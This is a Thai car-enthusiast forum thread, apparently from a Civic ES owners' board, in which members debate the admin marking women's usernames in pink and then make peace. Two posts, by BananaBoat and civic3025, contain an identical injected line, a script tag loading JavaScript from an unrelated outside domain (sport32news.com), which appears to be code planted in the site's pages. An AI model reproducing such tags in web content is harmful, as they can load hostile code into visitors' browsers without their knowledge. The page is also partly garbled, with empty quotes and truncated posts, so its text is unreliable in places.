หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
sopida

เข้าร่วม: 20 มกรา 2012
ตอบ: 4

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 1

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 26 มกรา 2012 00:54 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
คือไม่เข้าใจ ว่าทำไมถึงจะต้องทำชื่อ login ของผู้หญิงให้เป็นสีชมพู

บอร์ดนี้คือบอร์ดความรู้เรื่องรถยนต์ ข้อมูลที่คนขับรถรุ่นเดียวกันมาแชร์ข้อมูลกัน

แต่ที่ admin ทำชื่อเป็นสีชมพู เพื่อจะสร้างสีสันในบอร์ดหรือเปล่านั้น ? ไม่จำเป็นเท่าไหร่เลย

เรามาคุยเรื่องรถ กันไม่ใช่เหรอ ไม่ได้มาคุยเรื่องผู้หญิง ทำไมต้องทำให้ผู้หญิงดูโดดเด่นสะดุดสายตา

เพราะงั้นทำไมต้องมีแบ่งแยกว่าคนนี้ผู้หญิง คนนี้ผู้ชาย เดี๊ยวพอมีมิตติ้งก็ได้รู้จักกันเองว่า คนไหนชายคนไหนหญิง

ทั้งๆที่ที่นี่ก็บอร์ดคนเล่นรถ คนรักรถ ไม่ใช่บอร์ดโชว์อาวุธ ซื้อขายอาวุธ เบ่งกันไปมา หาเรื่องกัน เเบ่งแยกกัน

ขนาดห้องมิตติ้งยัง รณรงค์ไม่ให้ใช้คำว่า zone เลย แล้วทำไมจะต้องทำชื่อให้มันดูแบ่งแยกชายหญิง
ได้รับคำขอบคุณจาก: ผู้ใหญ่บ้าน  kaisuh  Sompot  ICE@WIN  khem_hatyai  Makai  ekdanai  mae 
BananaBoat

ชื่อเล่น: โบ๊ท

เข้าร่วม: 14 มกรา 2012
ตอบ: 472

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 345

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 26 มกรา 2012 01:17 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
รักกันไว้เถิด เราขับEs เหมือนกัน จะขับรุ่นไหน ก็Es ด้วยกัน เพศชายเพศหญิง ไม่มีกีดกัน เกิดใต้ธงไทยนั้นปวงชนทุกคนคือไทยยยยยยยยย
"<script src="https://sport32news.com/civicesgroup.js"> แหะแหะ
ได้รับคำขอบคุณจาก: sheclubzing  patoo  cakecity10  Guide6351  KAATO  kaisuh  Turngkung P 11  Phetcharat  benzd  Champ_civicES  khem_hatyai  Makai 
CoCain3z

เข้าร่วม: 01 กันยา 2011
ตอบ: 419

ได้รับคำขอบคุณ: 692
ให้คำขอบคุณ: 577

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 26 มกรา 2012 03:27 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
อืมมมมม...
ได้รับคำขอบคุณจาก: Turngkung P 11  Champ_civicES  khem_hatyai 
SONG1199

ชื่อเล่น: สอง

เข้าร่วม: 17 กันยา 2010
ตอบ: 437

ได้รับคำขอบคุณ: 391
ให้คำขอบคุณ: 222

สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 26 มกรา 2012 03:45 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
อืมมมมมม.....ครับ
ได้รับคำขอบคุณจาก: Guide6351  KAATO  benzd  Champ_civicES  khem_hatyai  sheclubzing 
qee

ชื่อเล่น: เอฟ

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 919

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 920
ให้คำขอบคุณ: 1087

ปี: 2002
สี: แดง ไฟร์เปปเปอร์ (R-507P)
พฤหัส, 26 มกรา 2012 04:49 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
กระทู้โน้นไม่ทันจบมากระทู้นี้อีกแล้ว ตายๆๆๆ
ได้รับคำขอบคุณจาก: sheclubzing  patoo  cakecity10  Guide6351  KAATO  Turngkung P 11  Champ_civicES  khem_hatyai  hikaru_kung 
นุรักษ์

ชื่อเล่น: นุรักษ์

เข้าร่วม: 07 สิงหา 2011
ตอบ: 104

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 163
ให้คำขอบคุณ: 368

ปี: 2001
พฤหัส, 26 มกรา 2012 06:21 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
จะหญิงจะชายแต่ทุกท่านที่มาอยู่ตรงนี้ รักใน Es เช่นเดียวกันใช่ไหมครับ :D
ได้รับคำขอบคุณจาก: patoo  khem_hatyai 
civic3025

ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 26 มกรา 2012 06:51 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
qee พิมพ์ว่า:
กระทู้โน้นไม่ทันจบมากระทู้นี้อีกแล้ว ตายๆๆๆ

admin คงต้องกินยาสักกระปุกอีกแล้วเหรอเนี้ย

ผมว่า admin เค้าออกมาชี้แจงแล้วนะเมื่อคืน เครียดแทน admin "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: patoo  sheclubzing  KAATO  Turngkung P 11  Champ_civicES  khem_hatyai  Makai 
sheclubzing

ชื่อเล่น: นายญิ๋ง

เข้าร่วม: 12 ธันวา 2011
ตอบ: 469

ได้รับคำขอบคุณ: 1265
ให้คำขอบคุณ: 965

ปี: 2004
พฤหัส, 26 มกรา 2012 06:55 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
qee พิมพ์ว่า:

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 26 มกรา 2012 07:27, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: patoo  Guide6351  EAK_75  Zeal  cakecity10  Sompot  Turngkung P 11  benzd  kai2003  Champ_civicES  civic3025  khem_hatyai 
แป้งร่ำ

เข้าร่วม: 25 พฤศจิกา 2009
ตอบ: 407

ได้รับคำขอบคุณ: 693
ให้คำขอบคุณ: 1030

พฤหัส, 26 มกรา 2012 06:59 - Re: อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
sopida พิมพ์ว่า:
คือไม่เข้าใจ ว่าทำไมถึงจะต้องทำชื่อ login ของผู้หญิงให้เป็นสีชมพู

บอร์ดนี้คือบอร์ดความรู้เรื่องรถยนต์ ข้อมูลที่คนขับรถรุ่นเดียวกันมาแชร์ข้อมูลกัน

แต่ที่ admin ทำชื่อเป็นสีชมพู เพื่อจะสร้างสีสันในบอร์ดหรือเปล่านั้น ? ไม่จำเป็นเท่าไหร่เลย

เรามาคุยเรื่องรถ กันไม่ใช่เหรอ ไม่ได้มาคุยเรื่องผู้หญิง ทำไมต้องทำให้ผู้หญิงดูโดดเด่นสะดุดสายตา

เพราะงั้นทำไมต้องมีแบ่งแยกว่าคนนี้ผู้หญิง คนนี้ผู้ชาย เดี๊ยวพอมีมิตติ้งก็ได้รู้จักกันเองว่า คนไหนชายคนไหนหญิง

ทั้งๆที่ที่นี่ก็บอร์ดคนเล่นรถ คนรักรถ ไม่ใช่บอร์ดโชว์อาวุธ ซื้อขายอาวุธ เบ่งกันไปมา หาเรื่องกัน เเบ่งแยกกัน

ขนาดห้องมิตติ้งยัง รณรงค์ไม่ให้ใช้คำว่า zone เลย แล้วทำไมจะต้องทำชื่อให้มันดูแบ่งแยกชายหญิง

ยังม่ะจบสินะ เฮ้อออ!!!!
ได้รับคำขอบคุณจาก: patoo  EAK_75  KAATO  Zeal  Turngkung P 11  benzd  kai2003  Champ_civicES  khem_hatyai  Makai  moonoy  kismcomed  art-antz-killers 
jjim

ชื่อเล่น: จิ้ม

เข้าร่วม: 12 พฤศจิกา 2008
ตอบ: 1016

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1082
ให้คำขอบคุณ: 155

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 26 มกรา 2012 07:08 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เอาน่าคิดว่าเป็นสีสันครับ คิดในทาง+ หน่อยครับอย่าคิดในทาง- คนเรายังมีขาวมีดำเลย
ได้รับคำขอบคุณจาก: Aek_EsCivic  patoo  Guide6351  Turngkung P 11  Champ_civicES  khem_hatyai 
sheclubzing

ชื่อเล่น: นายญิ๋ง

เข้าร่วม: 12 ธันวา 2011
ตอบ: 469

ได้รับคำขอบคุณ: 1265
ให้คำขอบคุณ: 965

พฤหัส, 26 มกรา 2012 07:29 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เราเข้า เว็ปนี้ สมัครเป็นสมาชิกมาเพราะต้องการความรู้เรื่องรถ
ต้องการมิตรภาพ ไม่ใช่ต้องการหาโจทย์หาศัตรูเลยแต่ที่พูดเราแค่ไม่เข้าใจ กะคำพูดคุณเท่านั้น
เราไม่ใช่คนขวางโลก อย่างที่คุณเข้าใจ เราอาจจะตอบเพราะอารมณ์ เพราะฉุนไปหน่อย
เราต้องการแค่เป็นสมาชิก1ในนี้เรื่องสีแบ่งแยก แล้วแต่คนดูแลจะจัดการเลยค่ะ เอาเสียงส่วนใหญ่ก็ได้ไม่ขัดข้องอยู่แล้ว
เพราะถึงจะยังไง เราก็คงเป็นสมาชิกesเช่นกัน หลายคนคงอ่านคงมองแล้วว่าเราทำตัวไม่น่ารักเอาสะเลย
แต่อารมณ์คนเราไม่เท่ากันนะค่ะ อาจจะกวนตีนไม่เข้าตาใครหลายคน ต้องขอโทษนะที่นี้ด้วยที่รุ้สึกว่ามันเด่นดัง
ไปกว่าใครเค้าหน่อย..เราก็คิดเหมือนพวกคุณ ที่ESเป็นเหมือนบ้านหลังที่2ของเรา เว็ปนี้เป็นส่วน1ของเรา
เราไม่ได้เสียใจที่เราทะเลาะกะคนพรรณนั้นแต่เราเสียใจที่ทำไม คนที่มีปากเสียง ต้องเป็นคนในesด้วย
ถ้าเป็นคนภายนอกคงไม่ทำให้เรารู้สึกแย่ได้ขนาดนี้เลยจริงๆ ... คำว่าขอโทษพูดไม่ยากหรอกสำหรับฉัน
ฉันยอมขอโทษ เอง โดยที่ไม่ต้องหาสาเหตู ว่าฉันจะถูกหรือผิดก็ตาม .. ขอโทษ ค่ะ
MoDes

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 26 มกรา 2012 07:37 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
อ้างอิงจาก:

กระทู้โน้นจบแล้วจ้า ขอโทษขอโพยกันหลังไมค์เรียบร้อยแล้ว เน๊อะคุณเมย์เน๊อะ อิอิ
ได้รับคำขอบคุณจาก: patoo  sheclubzing  Turngkung P 11  wut-chiangmai  Champ_civicES  khem_hatyai  hikaru_kung  art-antz-killers  numxs 
Aek_EsCivic

ชื่อเล่น: ขุนแผน

เข้าร่วม: 19 มกรา 2012
ตอบ: 49

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 94
ให้คำขอบคุณ: 190

พฤหัส, 26 มกรา 2012 07:38 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
sheclubzing พิมพ์ว่า:
เราเข้า เว็ปนี้ สมัครเป็นสมาชิกมาเพราะต้องการความรู้เรื่องรถ
ต้องการมิตรภาพ ไม่ใช่ต้องการหาโจทย์หาศัตรูเลยแต่ที่พูดเราแค่ไม่เข้าใจ กะคำพูดคุณเท่านั้น
เราไม่ใช่คนขวางโลก อย่างที่คุณเข้าใจ เราอาจจะตอบเพราะอารมณ์ เพราะฉุนไปหน่อย
เราต้องการแค่เป็นสมาชิก1ในนี้เรื่องสีแบ่งแยก แล้วแต่คนดูแลจะจัดการเลยค่ะ เอาเสียงส่วนใหญ่ก็ได้ไม่ขัดข้องอยู่แล้ว
เพราะถึงจะยังไง เราก็คงเป็นสมาชิกesเช่นกัน หลายคนคงอ่านคงมองแล้วว่าเราทำตัวไม่น่ารักเอาสะเลย
แต่อารมณ์คนเราไม่เท่ากันนะค่ะ อาจจะกวนตีนไม่เข้าตาใครหลายคน ต้องขอโทษนะที่นี้ด้วยที่รุ้สึกว่ามันเด่นดัง
ไปกว่าใครเค้าหน่อย..เราก็คิดเหมือนพวกคุณ ที่ESเป็นเหมือนบ้านหลังที่2ของเรา เว็ปนี้เป็นส่วน1ของเรา
เราไม่ได้เสียใจที่เราทะเลาะกะคนพรรณนั้นแต่เราเสียใจที่ทำไม คนที่มีปากเสียง ต้องเป็นคนในesด้วย
ถ้าเป็นคนภายนอกคงไม่ทำให้เรารู้สึกแย่ได้ขนาดนี้เลยจริงๆ ... คำว่าขอโทษพูดไม่ยากหรอกสำหรับฉัน
ฉันยอมขอโทษ เอง โดยที่ไม่ต้องหาสาเหตู ว่าฉันจะถูกหรือผิดก็ตาม .. ขอโทษ ค่ะ

ชอบลายเซ็นน้องเมย์ จังครับ
ได้รับคำขอบคุณจาก: sheclubzing  Turngkung P 11  Champ_civicES  khem_hatyai 
civic3025

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 26 มกรา 2012 07:47 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม

นี้ซิใช้เลย
ได้รับคำขอบคุณจาก: sheclubzing  Turngkung P 11  Champ_civicES  khem_hatyai  hikaru_kung 
patoo

ชื่อเล่น: พงษ์

เข้าร่วม: 28 สิงหา 2010
ตอบ: 1273

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5438
ให้คำขอบคุณ: 3559

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 26 มกรา 2012 07:51 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เสียงคนส่วนใหญ่โอเครแล้วก็จบเถอะครับ
ก็อย่างที่บอกเรามาคุยกันเรื่องแต่งรถ ไม่ได้มาดูเรื่องสีตัวหนังสือ ผมว่ามันก็ดูมีสีสรรดีนะ ขอให้เป็นเรื่องของแอดมินเถอะครับ ช่วงนี้รู้สึกหนักใจแทนแอดมินเลย เรากลับมาคุยให้สนุก แลกเปลี่ยนเรื่องรถอย่างที่เคยเป็นมาดีกว่าครับ อย่าให้ครอบครัวนี้มีแต่เรื่องเครียดๆเลยครับ ขอโทษด้วยนะครับถ้าคำพูดไม่ถูกใจใคร แต่อยากให้เราอยู่กันอย่างพี่น้องกันจริง เราให้กันเรื่องอื่นเยอะกว่านี้อีกครับ ขอเป็นกำลังใจให้แอดมินและพี่ๆทีมงานทุกคนด้วยนะครับ ด้วยรักและเคารพพี่น้องในครอบครัวทุกคนจริงๆครับ

ได้รับคำขอบคุณจาก: zan  Turngkung P 11  Champ_civicES  khem_hatyai  hikaru_kung 
coromant

เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
พฤหัส, 26 มกรา 2012 07:52 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ขออย่าให้กระทู้ถามเรื่องสีชื่อ login. กระทู้ thank หาย. บังเกิดในบอร์ดนี้อีกเลย สงสัยอะไรให้ PM ถาม shoke ผู้พัฒนาให้เว็บนี้ดีขึ้นเรื่อยๆ ผมอยู่ในบอร์ดแห่งนี้มาสี่ปีแล้ว เห็นการพัฒนาเว็บมาทุกแบบ แล้วเข้าใจโช๊คด้วยว่าเค้าพัฒนาบอร์ดให้ดูมีสีสัน เทียบเคียงเว็บอื่นๆ และทันสมัยตลอด อย่าให้เรื่องสีของ login มาสร้างความแตกแยกเลยครับ
wangyu

ชื่อเล่น: เอ๊ช

เข้าร่วม: 17 มิถุนา 2010
ตอบ: 7619

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6468
ให้คำขอบคุณ: 7442

พฤหัส, 26 มกรา 2012 07:54 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ถือว่าเป็นเป้าหมาย ของการเป็นสมาชิก ครับ

ได้รับคำขอบคุณจาก: Champ_civicES  khem_hatyai 
zaeson

ชื่อเล่น: อั้ม

เข้าร่วม: 30 มกรา 2009
ตอบ: 785

Guru ES
Guru ES

ได้รับคำขอบคุณ: 106
ให้คำขอบคุณ: 50

พฤหัส, 26 มกรา 2012 08:05 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
COROMANT พิมพ์ว่า:
ขออย่าให้กระทู้ถามเรื่องสีชื่อ login. กระทู้ thank หาย. บังเกิดในบอร์ดนี้อีกเลย สงสัยอะไรให้ PM ถาม shoke ผู้พัฒนาให้เว็บนี้ดีขึ้นเรื่อยๆ ผมอยู่ในบอร์ดแห่งนี้มาสี่ปีแล้ว เห็นการพัฒนาเว็บมาทุกแบบ แล้วเข้าใจโช๊คด้วยว่าเค้าพัฒนาบอร์ดให้ดูมีสีสัน เทียบเคียงเว็บอื่นๆ และทันสมัยตลอด อย่าให้เรื่องสีของ login มาสร้างความแตกแยกเลยครับ

ได้รับคำขอบคุณจาก: แป้งร่ำ  cakecity10  Guide6351  Champ_civicES  khem_hatyai  tamy2975  art-antz-killers 
Saksri

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 กรกฎา 2011
ตอบ: 1401

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1462
ให้คำขอบคุณ: 360

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 26 มกรา 2012 08:18 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม

วันนี้ เมย์ มาแนวน่ารักอ่ะ
ถูกใจอย่างแรง....เลย
ดีมากครับ ES เหมือนกัน
มีอะไรก็คุยกัน
เพื่อมิตรภาพที่ดีและยาวนาน

ได้รับคำขอบคุณจาก: Guide6351  sheclubzing  Champ_civicES  khem_hatyai  art-antz-killers  cakecity10 
ohmz1541

ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

ปี: 2003
พฤหัส, 26 มกรา 2012 08:27 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
COROMANT พิมพ์ว่า:

ได้รับคำขอบคุณจาก: Champ_civicES  khem_hatyai  yoosabai 
cakecity10

ชื่อเล่น: เค้ก

เข้าร่วม: 30 กันยา 2011
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 157
พฤหัส, 26 มกรา 2012 08:42 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม

ปัญหานี้เกิดจากคุณคนเดียวเลย ไม่เข้าใจเจตนาของคุณว่าต้องการอะไร เรื่องสี เค้าก็ทำให้มันสวยงาม ไม่เข้าใจว่าคุณซีเรียสเรื่องอะไร เห็นหรือยัง ว่าเเค่ความคิดของคุณคนเดียว ทำให้กระทู้ดูเเย่ลงไปมากๆ น่าเศร้าใจนะคะ ที่มีคนอย่างคุณ ความคิดอย่างคุณ เป็นสมาชิกอยู่ด้วยน่ะ
ได้รับคำขอบคุณจาก: zan  benzd  Champ_civicES  khem_hatyai  yoosabai  hikaru_kung  art-antz-killers 
notes68

เข้าร่วม: 09 สิงหา 2010
ตอบ: 15

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 18
ให้คำขอบคุณ: 2
พฤหัส, 26 มกรา 2012 08:43 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ผมว่าเจ้าของกระทู้พูดถูก ครับ คนที่ส่งสัยเยอะมากกว่าคนที่เข้าใจแต่ก้อไม่เอ่ยปาก
ใช่ครับ บอร์ด ไว้ปรึกษาเรื่องรถ แต่ที่ดูๆมา ชักไม่ใช่เรื่องรถน่ะครับ ดูมาหลายอันและขัดตาจิงๆ เรื่องตัวหนังสือ สี ชมพู ผมไม่เห็นด้วยอย่างแรง แบบ ที่ บอก 2 มาตรฐานชัดๆ ไม่เกี่ยวหรอกครับใครมาอยู่เวป 4ปี คุนไม่สามารถมาใช้ความคิดตัวเองให้คนอื่นเข้าใจหรอกที่คนอื่นสงสัยก้อคือจะมีระเบียบไว้ทำไม จะมาอ้างให้เข้าใจ ระบบก้อคือระบบ
และอีกอย่าง สมัยก่อนพอมีคนมาแนะนำตัวว่าผมซื้อรถes ขอเป็นสมาชิคด้วยคนครับผมเป็นน้องใหม่ โดยที่ไม่นำรถตัวเองมาแสดงหรือถ่ายรูปใาโชว์ ในบอร์ดเราก้อจะบอกว่า ไหนๆเอา es มาโชว์หน่อยเหมือนจะบอกว่าไหนซื้อมาเอามาให้ดูหน่อยดิถ่ายรูปอ่ะ ทำไมไม่มีอย่างนั้นเกิดขึ้นอ่ะครับ ผมไม่เหน ที่สมาชิคในบรอดเราบางคนที่ถูกพลาดพึงพูดถึรถตัวเองเลยครับ เข้ามาในบรอดเหมือนมาหาอย่างอื่นน่ะ ไม่ได้มาหาความรู้เรื่องรถ และบางสิ่งบางอย่างที่เอามาลง กรุณา ค้นหาก่อนเอามาลงน่ะครับผมว่า บางอันมันซ้ำอ่ะ เนี่ยสิครับที่เรียกว่า รกบอร์ด
กรุณาน่ะครับเคารพกดกติกาด้วยน่ะครับ ไม่ใช่อภิสิทธิ์ส่วนตัว คนที่ทำประโยชน์ครับที่สมควรได้ ไม่ใช่มีแต่เรื่องไร้สาระแล้วได้นั้นได้นี้
ได้รับคำขอบคุณจาก: kaisuh  Champ_civicES  khem_hatyai  Makai 
notes68

น้องใหม่
น้องใหม่

พฤหัส, 26 มกรา 2012 08:46 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
cakecity10 พิมพ์ว่า:

ปัญหานี้เกิดจากคุณคนเดียวเลย ไม่เข้าใจเจตนาของคุณว่าต้องการอะไร เรื่องสี เค้าก็ทำให้มันสวยงาม ไม่เข้าใจว่าคุณซีเรียสเรื่องอะไร เห็นหรือยัง ว่าเเค่ความคิดของคุณคนเดียว ทำให้กระทู้ดูเเย่ลงไปมากๆ น่าเศร้าใจนะคะ ที่มีคนอย่างคุณ ความคิดอย่างคุณ เป็นสมาชิกอยู่ด้วยน่ะ

เค้าแค่สงสัยเลยถามความจิงไม่ได้มาต่อว่า

คุนต่างหากที่ทำให้เวปเสื่อมคุน cakecity10
ได้รับคำขอบคุณจาก: kaisuh  Champ_civicES  khem_hatyai  mae 
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

พฤหัส, 26 มกรา 2012 08:48 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ถ้ามีปัญหาเรื่องสีตัวอักษร ผมขอเสนอ ว่าให้สามารถระบุเพส ในหน้า Profile ได้ แล้วแสดง ที่บอร์ด อาจจะแสดงล่างชื่อเล่นก็ได้ครับ ว่าเป้นเพศ ชาย หรือ หญิง ส่วนตัวอักษรที่เป็น สี จะให้เฉพาะผู้ที่มีตำแหน่งต่าง ๆในบอร์ด เช่น admin, Moderator
เป็นต้น วิธีนี้จะแก้ปัญหาที่ว่า user ที่เป้นผู้หญิง บางคนเป็นสีชมพู บางคนไม่เป็น ได้

เสอนความคิดเห็นเท่านี้จ้า........
ได้รับคำขอบคุณจาก: notes68  nismo  Champ_civicES  wut-chiangmai  khem_hatyai 
Hamster@Yamabuchi

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

พฤหัส, 26 มกรา 2012 08:49 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เอาอีกล่ะ เห็นแระเบื่อ อะไรกันหนักกันหนาเนี่ย เรื่องขี้หมาแบบนี้ก็เอามาเป็นประเด็นกันอีกแระ เห้อๆๆๆๆๆๆๆ ทำไมบอร์ดมันกลายเป็นเรื่องแบบนี้ไปทุกวันเลยเนี่ย เดี๋ยว สติ๊กเกอร์ เดี๋ยวแต๊งค์ เดี๋ยวเกรียน เดี๋ยวสีชื่อ ไม่เข้าใจจริงๆว่ะ ต่อไปอะไรอีกดี ห๊ะ ลองหยุดๆๆ แล้วคิดว่าเข้าเมืองตาหลิ่ว ต้องหลิ่วตาตาม บ้างได้ไหม มันจะได้กลับมาเหมือนเดิมซะที
sukhothai

เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
พฤหัส, 26 มกรา 2012 08:49 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
อย่าคิดมากเลยครับ จะอะไรยังไงก็ปล่อยวางมันบ้าง

เราสมัครเข้าเว็ปมาเพื่อจุดประสงค์อะไร เพื่อหาเพื่อน

ที่รักในสิ่งเดียวกันไม่ใช่หรือ เพื่อหาความรู้เกี่ยวกับรถ

ที่เรารักไม่ใช่หรือ เพื่อแรกเปลี่ยนความคิดเห็นเกี่ยวกับรถ

หรือเรื่องอื่นที่สร้างสรรค์ไม่ใช่หรือ และถ้าเราได้ส่งที่ต้องการ

แล้วยังจะมีอะไรที่เราต้องสนใจอีกงั้นหรือ บางที่คนเราสงสัย

หรือไม่พอใจได้ แต่บางครั้งก็ไม่จำเป็นต้องแสดงออกทุกครั้ง

( ไม่ว่าจะอยู่ในสังคมไหนจงรักษามิตรภาพในสังคมนั้นให้ดี )

ได้รับคำขอบคุณจาก: แป้งร่ำ  patoo  zan  KAATO  mark_es03  Phetcharat  nismo  Champ_civicES  wut-chiangmai  khem_hatyai  yoosabai  PAE KUNG  hikaru_kung 
EAK_75

ชื่อเล่น: เอก

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1647

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1476
ให้คำขอบคุณ: 828

พฤหัส, 26 มกรา 2012 08:53 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม

รักกันๆ เพื่อนๆกัน ทั้งนั้นนะเมย์
ได้รับคำขอบคุณจาก: Champ_civicES  khem_hatyai 
MoDes

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

พฤหัส, 26 มกรา 2012 08:56 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
อ้างอิงจาก:
อย่าคิดมากเลยครับ จะอะไรยังไงก็ปล่อยวางมันบ้าง

เราสมัครเข้าเว็ปมาเพื่อจุดประสงค์อะไร เพื่อหาเพื่อน

ที่รักในสิ่งเดียวกันไม่ใช่หรือ เพื่อหาความรู้เกี่ยวกับรถ

ที่เรารักไม่ใช่หรือ เพื่อแรกเปลี่ยนความคิดเห็นเกี่ยวกับรถ

หรือเรื่องอื่นที่สร้างสรรค์ไม่ใช่หรือ และถ้าเราได้ส่งที่ต้องการ

แล้วยังจะมีอะไรที่เราต้องสนใจอีกงั้นหรือ บางที่คนเราสงสัย

หรือไม่พอใจได้ แต่บางครั้งก็ไม่จำเป็นต้องแสดงออกทุกครั้ง

( ไม่ว่าจะอยู่ในสังคมไหนจงรักษามิตรภาพในสังคมนั้นให้ดี )

+100 เลยครับ
ได้รับคำขอบคุณจาก: khem_hatyai 
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

พฤหัส, 26 มกรา 2012 09:00 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
สมัครชื่อใหม่ มาโพสเพื่อการณ์นี้โดยเฉพาะ

ถ้าสงสัย มีคำถาม ถามได้ครับ ทางทีมงานจักตอบให้อย่างสุภาพ

ส่วนเรื่องLogin สีชมพูของสมาชิกผู้หญิง มีมาตั้งแต่ไหนแต่ไรแล้วครับ ไม่ใช่เพิ่งมามีช่วงนี้ เป็นการปรึกษาหารือกันมาตั้งนานแล้วครับ

ถ้ามีข้อสงสัย สิ่งต่างๆที่เกิดขึ้นในบอร์ดแห่งนี้ PMมาสอบถามผมได้โดยตรง หรือจะโพสสิ่งที่มีข้อสงสัยโดยตรงถึงผม แล้วเดี๋ยวผมมาตอบข้อสงสัยให้นะครับ

ขอบคุณที่ให้ความสนใจในการใช้บอร์ด

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 26 มกรา 2012 09:04, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
notes68

น้องใหม่
น้องใหม่

พฤหัส, 26 มกรา 2012 09:01 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
